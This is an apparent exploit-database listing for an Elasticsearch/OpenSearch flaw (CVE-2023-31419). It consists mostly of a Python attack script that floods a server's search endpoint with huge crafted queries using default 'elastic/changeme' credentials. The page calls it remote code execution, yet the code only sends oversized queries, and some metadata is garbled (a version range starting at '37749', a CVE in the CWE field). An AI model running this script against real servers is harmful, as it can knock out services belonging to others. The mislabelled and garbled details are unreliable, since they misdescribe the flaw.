header-logo
Suggest Exploit
vendor:
Elasticsearch
by:
TOUHAMI KASBAOUI
6.1
CVSS
HIGH
Remote Code Execution
20
CWE
Product Name: Elasticsearch
Affected Version From: 37749
Affected Version To: 8.5.3 / OpenSearch
Patch Exists: NO
Related CWE: CVE-2023-31419
CPE: a:elastic:elasticsearch:8.5.3
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04 LTS
2023

Elasticsearch Remote Code Execution Vulnerability

The exploit allows an attacker to execute remote code on Elasticsearch versions 8.5.3 and OpenSearch. By sending a crafted payload within a search query, an attacker can trigger the vulnerability. This exploit is linked to CVE-2023-31419.

Mitigation:

To mitigate this vulnerability, it is recommended to update Elasticsearch to a patched version. Additionally, restrict access to the Elasticsearch server to trusted users only.
Source

Exploit-DB raw data:

# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://elastic.co/
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419

import requests
import random
import string

es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
index_name = '*'

payload = "/*" * 10000 + "\\" +"'" * 999

verify_ssl = False

username = 'elastic'
password = 'changeme'

auth = (username, password)

num_queries = 100

for _ in range(num_queries):
    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
    search_query = {
        "query": {
            "match": {
                "message": (symbols * 9000) + payload
            }
        }
    }

    print(f"Query {_ + 1} - Search Query:")

    search_endpoint = f'{es_url}/{index_name}/_search'
    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

    if response.status_code == 200:
        search_results = response.json()

        print(f"Query {_ + 1} - Response:")
        print(search_results)

        total_hits = search_results['hits']['total']['value']
        print(f"Query {_ + 1}: Total hits: {total_hits}")

        for hit in search_results['hits']['hits']:
            source_data = hit['_source']
            print("Payload result: {search_results}")
    else:
        print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")